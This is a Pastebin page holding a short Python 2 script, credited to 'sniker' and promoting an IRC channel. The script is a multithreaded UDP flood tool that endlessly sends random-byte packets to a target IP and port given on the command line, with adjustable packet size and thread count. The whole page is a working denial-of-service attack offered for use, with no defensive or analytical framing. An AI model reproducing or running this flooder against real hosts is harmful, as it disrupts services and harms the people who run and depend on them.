Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import socket
- import threading
- import random
- import sys
- ############################################
- #
- # Author: sniker
- # Contact: irc.eth0.info
- #
- # eth0 will prevail. || irc.eth0.info
- #
- ############################################
- class attack(threading.Thread):
- def __init__ (self, ip, port, psize):
- threading.Thread.__init__(self)
- self.ip = ip
- self.port = port
- self.psize = psize
- def run(self):
- print "Thread initiated, flooding " + self.ip + ":" + str(self.port) + "."
- sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
- bytes = random._urandom(self.psize)
- while True:
- sock.sendto(bytes,(self.ip, self.port))
- if len(sys.argv) < 2:
- print "Usage: "+ sys.argv[0] +" IP PORT(optional, default random) PACKETSIZE(optional 0-65500 default 1024) THREADS(optional default 10)"
- sys.exit()
- try:
- threads = sys.argv[4]
- except NameError:
- threads = 10
- except IndexError:
- threads = 10
- try:
- if int(sys.argv[3]) > 0 and int(sys.argv[3]) <= 65500:
- psize = int(sys.argv[3])
- print psize
- else:
- psize = 1024
- except IndexError:
- psize = 1024
- for host in range(int(threads)):
- try:
- port = sys.argv[2]
- except IndexError:
- port = random.randrange(1, 65535, 2)
- at = attack(sys.argv[1], int(port), int(psize))
- at.start()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement